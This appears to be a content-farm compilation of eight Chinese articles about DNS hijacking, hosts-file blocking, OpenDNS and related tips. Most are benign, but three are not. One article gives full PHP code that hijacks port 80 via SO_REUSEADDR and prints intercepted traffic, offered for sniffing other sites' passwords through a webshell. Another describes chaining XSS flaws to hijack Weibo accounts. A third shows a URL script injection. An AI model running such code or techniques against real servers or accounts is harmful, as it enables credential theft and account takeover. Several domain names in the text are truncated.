【导语】下面是小编为大家整理的教你屏蔽电信114的DNS劫持(共8篇),欢迎大家借鉴与参考,希望对大家有所帮助。
篇1:教你屏蔽电信114的DNS劫持
樱木花盗
好多时候打开网页的时候会首先跳转到114的搜索页面
也就是只要一打开第一个页面无论什么样都会被转到*.welcome.vnet这样的页面( *.vnet)
于是百度了下别人的解决方法发觉都是文不对题,
研究了下其实解决方法很简单~
用路由的朋友们 只需要打开 路由器的设置页面(192.168.1.1/192.168.0.1)
在里面找到
ip屏蔽或者域名过滤
在里面添加.vnet和.114.vnet
直接用XP拨号的朋友也用两种方法
1:打开IE属性-隐私-站点- 输入vnet和114.vnet 然后选择 阻止
2:用记事本打开 C:WINDOWSsystem32driversetc 下的 hosts,把下面的内容粘贴到里面:
127.0.0.1 localhost
127.0.0.1 vnet
127.0.0.1 bbs.114.vnet
127.0.0.1 114.gz.vnet 注:gz代表地方!可以自行修改为当地114服务提供商的地址!
127.0.0.1 search.114.vnet
127.0.0.1 www.114
127.0.0.1 keyword.vnet
127.0.0.1 vnet
127.0.0.1 114.vnet
127.0.0.1autosearch.gd.vnet
2.使用opendns,即dns改为208.67.222.222以及208.67.220.220,不过访问国内有些网站dns解析会出错,比如新浪,
需要在hosts添加 202.108.33.32 www.sina
还有如果只是讨厌 搜索东东或者输错网址的时候 会跳转到 电信114(114.vnet)的朋友
也很简单
方法如下:
internet选项-高级-从地址栏搜索-选择 不从地址栏搜索 就搞定啦
篇2:电信DNS劫持,dns劫持解决办法
全国电信DNS劫持导致的现象及解决方法现在很多地方的电信都在你打开网页的时候,页面请求DNS域名解析那一步,给你解析出来一个广告页面(比如网通、电信、移动或者你所在地门户网站之类大站点的广告),特别是使用了各种广告间谍软件甚至手动检查都没有发现问题,而且你使用任何浏览器(IE核心的或者FireFox、Opera)都是一样,然后过几秒重定向到你访问的页面(访问论坛而且又使用cookies就比较麻烦了,这个时候会显示你没有登录),或者使用内嵌广告框架的方式一直出现在浏览器中,更烦人。
一.这个服务的特点有三个:
1.OpenDNS可以识别和阻止钓鱼(Phishing)网站,就像在你访问的网站和你之间设了一个检查站,保护你的安全。
2.比一般的DNS更快:两个特点保证了OpenDNS更快,首先它拥有一个大型的、智能化的缓存,这能够保证用户可以从庞大的OpenDNS用户库中获利;OpenDNS有一个高性能的按地理分布的网络和多个冗余备份连接,它会根据你的访问选择最近的地理位置。
3.OpenDNS可以自动纠正拼写错误:如果你不小心输入网址时拼写错误(比如少了个字母),OpenDNS也能将你引导到正确的网站,或者提供一个相似网站的搜索列表。
二.使用方法:
只要把网络连接属性(TCP/IP协议属性页)中的主要DNS和次要DNS分别改成:
·208.67.222.222
·208.67.220.220
进入控制面板的网络连接中,右键点击ADSL拨号连接的那个图标,选择属性。然后在“网络”那页找到“Internet 协议(TCP/IP)”,选择属性。将“自动获得DNS服务器地址”改为“使用下面的DNS服务器地址”。
问题解决
如果你看到错误页面, 请再试, 刷新欢迎页面缓存
1.首先, 访问我们的示例站点internetbadguys. 如果你成功转换到 OpenDNS, 它将锁定到公共站点.否则, 他将告诉你这是一个示例站点
2.其次, 输入一个错误的TLD后缀网站, 比如 craigslist.og 。 如果你用OpenDNS, 你将转道一个分类站点.如果不用OpenDNS,你将得到你默认浏览器的错误页面。
3.仍然没有工作起来? 也许你应该重启你的浏览器以及路由器
还要注意:
改完DNS服务器还不行,还要清除本机上的DNS缓存,可以用命令来ipconfig /flushdns、ipconfig /displaydns来实现,或者清除浏览器的历史记录、重启电脑。
ipconfig /displaydns用来显示本机的DNS缓存和Host文件的内容,例如我就显示了这么一条:
把www.imagegarden解析成了61.151.253.88,打开这个IP你就会发现现象1,显然这是有问题的。
篇3:教你屏蔽my.126的广告
教你屏蔽my.126的广告
:简单生活 siyizhu.126
到 my.yeah 登陆.修改URL栏如下
Quoted from Unkown:
kiss.lz4f/blog/“;;}};comm;function comm(){{window.location =”kiss.lz4f/blog/
演示:siyizhu.126
将上面红色文字修改为你要跳转的URL
就这么简单,彻底屏蔽**.126广告
篇4:电信屏蔽Godaddy部分DNS服务
从7月16日开始,国内部分地区用户(主要是西安电信和部分地区联通用户)向我反映,无法访问我的博客,经过我的测试排查发现,原因是部分地区的电信运营商屏蔽了我博客DNS解析服务商Godaddy的DNS服务,西安电信的DNS服务器218.30.19.40已将Godaddy的某些DNS屏蔽,使导致那些使用Godaddy DNS的网站都无法从西安访问,包括我的博客在内,
Godaddy成立于,是全球域名注册排名第一的服务商,全球市场占有率达18%。域名的附加服务很多,价格低廉,平均价格只有国内域名服务的一半,是一个非常不错的域名服务商,包括我在内的众多网站主都在使用Godaddy的域名注册服务。
屏蔽DNS的恶劣影响
中国电信以前曾经短暂地屏蔽过Godaddy的服务器地址,但那对于在Godaddy购买网站的用户来说影响不大,这次直接屏蔽Godaddy的NS(域名解析)服务,影响非常恶劣,为了“惩罚”某一两个网站,直接导致成千上万的无辜网站无法访问,可谓“宁可错杀一千,不可放过一个”的极端手段。
我这里确认被封的Godaddy DNS服务器有 57、58、67、68、77、78、33、34号,如果你的域名使用这几个DNS地址,需要将其修改为其他的DNS地址,否则将无法从某些地区访问。
各地用户验证方法:
1、点“开始”-“运行”-输入CMD,再输入 ipconfig /all ,在下“DNS SERVER”里找到你使用的DNS服务器地址,
2、再输入 nslookup www.williamlong.info 你的DNS服务器IP ,来查看是否能解析。
3、再输入 nslookup www.williamlong.info 8.8.8.8 使用Google的DNS服务器验证。
网站主的解决方案:
1、换用Godaddy的其他DNS服务器地址,Godaddy有很多DNS服务器,短时间内看,不可能全部都屏蔽掉。
2、换用第三方DNS解析服务,目前有很多第三方网站提供DNS解析服务,不少都是免费的,国内也有免费提供DNS解析服务的,使用第三方DNS服务可以部分解决问题,电信总不可能将世界上所有DNS服务器都屏蔽掉,那就相当于局域网了。目前月光博客选用这种解决方案,估计一两天内可以见效。
此外,不建议将Godaddy的域名迁移到国内,如果域名迁移到国内,那就不是屏蔽NS的问题了,而是直接clientHold,到时候就哭都来不及了。
对西安网友的建议:
西安的网友如果换用深圳的DNS服务器,暂时可以解决这个问题,全国各地的DNS服务器列表参见这里。
此外,西安电信的这种极端做法,完全不顾用户的上网权利,其屏蔽的那些DNS服务器,使用的网站何止千万,这么一刀切的管理做法实在野蛮,建议西安的网友为了自己的合法权益,拨打电信的服务电话10000进行投诉,直到西安电信改变错误为止。
篇5:手把手教你劫持李开复的 脚本安全
想劫持李开复老师的微博怎么办?
发私信扔个URL?NO,人家不会看私信的,
发邮箱?NO,压根不知道邮箱是多少?
还有什么办法呢?那就是本文!
李开复老师,注意安全哟
详细说明:
1. 如简单描述中所述,常规方法多半是不行的。
2. 我们根据李开复老师的职业习惯,以及微博发送内容,可以了解到他经常会上一些资讯、科技类网站。比如36kr。如果我们能在36kr的网站上插入一段JS代码,里面再嵌入一个反射型XSS,此时李开复老师访问36kr且带有QQ的登录状态。我们就可以成功劫持李开复老师微博了。
3. 36kr是很多站长,投资人都会去上的一个资讯网站。本人身边也有不少朋友经常去看。网站本身是否可被入侵不得而知,但是难度相对不小。看了看36kr。没什么问题,挺小清新的。
【图片1】
4. 随后点进去一篇文章,可以看到文章的最下方,有社交评论插件。
【图片2】
3. 问题就在这里了。 这个评论插件是一家第三方网站(denglu),而且经过我们的检测,是存在安全问题的。例如:这里我们对其进行了XSS检测,发现其存在存储型XSS。我们可以成功在评论中插入我们的XSS代码。
【图片3】
4. 当然,惯性的思维是,就算是denglu存在XSS,顶多影响的是denglu的用户,而实际上并不是这样。 我们完全可以植入36kr自己的反射型XSS,或者第三方网站,如:腾讯的反射型XSS,来达到存储型XSS的效果。
这里以腾讯某处反射型XSS为例。我们在36kr的文章下进行批量推送评论。
【图片4】
5. 这样一来,我们的恶意JS代码,就被夹杂到36kr的文章评论中了,见步骤3截图。
当然普通用户对此会毫不知情。一旦用户访问了36kr的文章,我就会让他们去关注乌云的 。
6. 接着就是等待。 终于在某一天,李开复老师来了。我看到他的 关注了【乌云漏洞报告平台】以及某些QQ官方账号 (这些账号用做参照:排除因为李开复老师自己主动收听【乌云漏洞报告平台】而造成的假阳性结果),
【图片5】
7. 我们通过,36kr --> denglu --> 腾讯某站反射型XSS --> 的方式,在不是非常漫长的蹲点之后,捕获到了李开复老师的微博。在整个过程中,我们还捕获到了很多其他站长以及投资人的微博。其中也包括其他网站的某些人,比如UCWEB的,还包括36kr自己网站的一些人。腾讯的cookies没有http-only,因此我们可以使用获取的cookies,来使用这些帐号登录QQ其他应用(如QQ邮箱),进而进行后续利用(具体利用危害见:WooYun: 跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷))。如下图:
【图6】
8. 声明:我们是友好的测试,整个测试过程中,并未获取记录任何cookies数据,关注微博的请求是通过csrf来实现的。我们使用“微博关注”的方式来统计了危害效果,并未动用victim的微博帐号去做任何其他事情。
9. 最后总结:
到头来,本质上来说,漏洞的根源在于腾讯和denglu,而36kr只是一个第三方插件的受害者,成为了攻击者的跳板。我们可以从中学习到两点。
9.1. 腾讯业务线长,类似的反射型XSS漏洞十分多,依靠腾讯安全 中心每天扫描后,再做一些不是很靠谱的修复,只是增加了攻击者寻找缺陷的时间而已,但是并没有从真正意义上解决用户的安全问题,这种解决方式是十分、非常、极其不可取的。本例就是一个典型,修复了成百上千个XSS又如何?再随便找一个反射型XSS就over了。
任何一个【微不足道的】分站的【微不足道的】反射型XSS都会危害到用户的微博,邮箱,QQ空间等应用是一件多么可怕的事情。试想,你们还敢随便点开一个网页吗? 一点开,就莫名其妙的,自己QQ的各种WEB应用随时被劫持?随时受不了,随手受不了。
因此强烈建议, 自己再加一次验证吧。
9.2. denglu这种第三方的插件也在不断涌现,而其中一部分程序在设计时又缺乏对安全的考虑。因此站长在使用此类程序时,请谨慎选择,勿将用户的安全抛给了第三方的插件。
截至本稿:36kr官方已经更换掉了第三方评论插件。
漏洞证明:
修复方案:
36KR已经换了评论插件,denglu的问题还没修复.重要的是腾讯微搏的问题要好好修修.
篇6:教你如何利用php来嗅探劫持服务器数据
前几天刺在我们的maillist发了一个老外写的文章,大意是可以用php来实现数据的劫持和转发,我瞄了一下,确实可行,于是今天抽出了以前用来扯淡的时间,写了段代码验证了一下想法。老外的原文是一个PDF,有兴趣看的可以看看。地址是在:www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf。其实关于这个的原理,我记得很早很早之前flashsky就在xfocus上面贴过通过SO_REUSEADDR实现端口重复绑定的,mix还写过一个 guest权限嗅探密码的。我这里比较不同的是用php实现的,可以在webshell里面用,当然我没有测试过,我没shell。
需要注意的是,这个东西和以前的《PHP下实现端口复用/劫持》是完全不一样的,那个文章可以在这里找到:www.west999/info/html/wangluobiancheng/Phpbiancheng/0224/22439.html。至于为什么不一样,我就不说了。
代码我注释得很详细,个人觉得写得还不错,不细说。这里大概说一下技术上的难点。首先是在web里面,没有多线程也没有多进程,但是每一个新连接进来就要去处理,应该怎么做?显然不能顺序执行,因为光accept那里就会被阻塞住的,而且后面每一个session也需要分别处理的。还好查手册发现经典的socket_select函数可用,有这个就好说了,专业实现多路复用的。
PHP代码如下,有详细注释。blog贴的,所以代码可能会掉些东西,其他的支持我就不提供了,看代码:
class select
{
var $sockets;
// 构造函数
function select($sockets)
{
$this->sockets = array;
foreach($sockets as $socket)
{
$this->add($socket);
}
}
function add($add_socket)
{
//array_push($this->sockets, $add_socket);
$this->sockets[] = $add_socket;
}
// 利用临时数组来删除数组中的元素
function remove($remove_socket)
{
$tmp_sockets = array();
foreach($this->sockets as $socket)
{
if($remove_socket != $socket)
{
$tmp_sockets[] = $socket;
}
}
$this->sockets = $tmp_sockets;
}
// 检查socket数组是否可读,传入超时时间,返回socket数组
function can_read($timeout)
{
$read = $this->sockets;
socket_select( $read, $write = NULL, $except = NULL, $timeout );
return $read;
}
// 检查socket数组是否可写,传入超时时间,返回socket数组
function can_write($timeout)
{
$write = $this->sockets;
socket_select( $read = NULL, $write, $except = NULL, $timeout );
return $write;
}
}
// 网页不超时
set_time_limit(0);
// 即时输出数据,不缓冲
ob_end_clean();
ob_implicit_flush(true);
if( !isset($_GET[“listen_ip”]) )
{
exit;
}
if( $_GET[“listen_ip”] == “” )
{
exit;
}
$listen_ip = $_GET[“listen_ip”];
$listen_port = 80;
// 建立socket
$listen_sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
// 设置重复绑定
socket_set_option($listen_sock, SOL_SOCKET, SO_REUSEADDR, 1);
// 明确指定绑定IP地址,优先获取数据
socket_bind($listen_sock, $listen_ip, $listen_port);
// 开始监听
socket_listen ($listen_sock);
echo “listen on ”.htmlentities($listen_ip).“ :”.$listen_port.“
”;
// 创建socket数组,使用select来轮询
$check_socks = array($listen_sock);
// 映射客户端socket和服务端socket
// $socket_maps1将客户端socket作为key
// $socket_maps2将服务端socket作为key
// 以内存换速度,并且方便下面的搜索
$socket_maps1 = array( );
$socket_maps2 = array( );
// 实例化select类
$select = new select( $check_socks );
while(true)
{
/*
print_r( $socket_maps );
print “
”;
*/
// select轮询,超时2秒
foreach ($select->can_read(1) as $socket)
{
// listen_sock可读,说明有人连接上来了
if( $socket == $listen_sock )
{
// 接受新连接,并加入到轮训数组
$new_client = socket_accept($listen_sock);
$select->add($new_client);
socket_getpeername($new_client, $ip, $port);
echo “New client connected: $ip, $port
”;
// 建立到真实服务器的socket
$server_sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($server_sock,“127.0.0.1”, $listen_port);
// 建立真实服务器socket和真实客户端socket之间的映射关系
$socket_maps1[$new_client] = $server_sock;
$socket_maps2[$server_sock] = $new_client;
// 添加到select轮询中
$select->add($server_sock);
// $listen_sock的可读数据是因为有新连接,已经处理了,
暂时去掉,因为下面开始处理数据转发
//select->remove( $listen_sock );
}
// 其他socket可读,表示有数据需要中转
else
{
// 读取数据,失败则从轮询socket中删除,并关闭socket
$client_data = @socket_read($socket, 1024, PHP_NORMAL_READ);
if ($client_data === false)
{
socket_close( $socket );
$select->remove( $socket );
echo “client disconnected.
”;
continue;
}
// 如果socket在$socket_maps1的key中,说明是从客户端读到了数据
if( in_array( $socket, array_keys($socket_maps1)) )
{
//echo “readed from client.
”;
if( ! socket_write( $socket_maps1[$socket], $client_data ) )
{
socket_close( $socket );
socket_close( $socket_maps1[$socket] );
$select->remove( $socket );
$select->remove( $socket_maps1[$socket] );
print “Write to server error.
”;
}
print htmlentities($client_data).“
”;
}
// 否则如果socket在$socket_maps2的key中,说明是从真正的web服务器读到了数据
elseif( in_array( $socket, array_keys($socket_maps2) ) )
{
//echo “readed from server.
”;
if( ! socket_write( $socket_maps2[$socket], $client_data ) )
{
socket_close( $socket );
socket_close( $socket_maps2[$socket] );
$select->remove( $socket );
$select->remove( $socket_maps2[$socket] );
print “Write to client error.
”;
}
print htmlentities($client_data).“
”;
}
}
}
}
?>
这个东西有什么作用?自由发挥。也许你有一个webshell,但是却想知道同一个服务器上面别人网站的密码……我是在windows xp+apache测试的,据我所知windows默认已经不准重复绑定端口了。
篇7:不再骚扰 教你快速屏蔽QQ群的消息
好多朋友都加入了多个QQ群,这样可以很方便地和更多朋友聊天,但同时也增加了很多收到垃圾消息的机会。我们可以通过在QQ中设置群消息接收方式来屏蔽掉没有的群消息。
具体操作步骤如下:
1. 登录QQ,打开“群 / 校友录”一栏,右击一个群图标,执行“查看群组资料”命令;
2. 在弹出的对话框中点击“消息设定”标签,此时窗口右侧便显示出了群消息的接收处理方案(图1),
3. 这里的设置比较简单,大家一看就能明白,比如在这里笔者选择了“消息来时只显示消息数目”一项,这样以后QQ在接收到群消息时便不会再提示我了,而是直接地自动保存下来,并将消息的数目显示在群帐户的右侧,方便用户查看(图2)。
建议大家在使用这项功能时将图1设置窗口中的“是的,我要保存在服务器上”一项勾取,这样,即使您在其它电脑上登录QQ时,群消息的设置也会自动生效。
篇8:教你如何巧妙修改hosts文件 手工屏蔽恶意网站
一、什么是hosts文件
hosts文件存在于Windows目录下的system32driversetc中,这个文件没有扩展名,但是,我们可以使用记事本来打开编辑。打开文件,可以看见其中有很多英文解释,在文件末尾,有127.0.0.1localhost这一行字。这个文件包括主机的IP地址和映像名称,输入的每一个地址都应该放在单独的行列中。IP地址应该被放在对应的主机名的第一栏中。IP地址与主机名之间应该至少有一个空格。
由于我们在访问网站时,对hosts文件的请求级别比DNS服务器高,因此修改hosts文件可以对指定的网址进行处理,达到防止用户访问特定网站的效果。
hosts文件还可以加快我们对网站的访问速度。在我们访问网络的时候,我们的计算机向DNS服务器发送一个网络域名,DNS服务器则把这个域名解析成为一个IP地址后返回给计算机。这个过程会使访问网站的速度减慢。正确地对hosts文件进行编辑可以加快对网站的访问速度。如:在hosts文件中添加指定的IP地址,使得DNS服务器不用对网页的地址进行解析。
其实,hosts文件还有其他的特殊高级功能:如方便局域网用户顺利连接系统等。这些功能可以大大减少我们对网络的访问时间,使我们对网络的访问更快捷、更方便,
二、屏蔽特定网站
要屏蔽特定网站,我们可以如下操作。
1.在C:windowssystem32driversetc中,找到hosts文件,用记事本打开。
2.在文件的最下方输入你要屏蔽的几个网站的地址,格式如下假设要屏蔽的网址为my123***:
127.0.0.1 www.my123***
127.0.0.1 my123***
3.保存hosts文件。
4.将hosts文件的属性改为只读,防止被病毒篡改。
三、加速访问网站
要加快网址的解析速度,为我们访问网站提速,先要查找你所需要访问的网站的IP地址,可以使用ping命令。然后,打开hosts文件,在文件的末尾加上“IP地址域名”。
最后,保存hosts文件并修改为只读属性。当你再次浏览该网站时,域名―IP地址的解析工作就由你本机完成了,不需要访问DNS服务器,加快了网站访问速度。
更多推荐
教你屏蔽电信114的DNS劫持
发布评论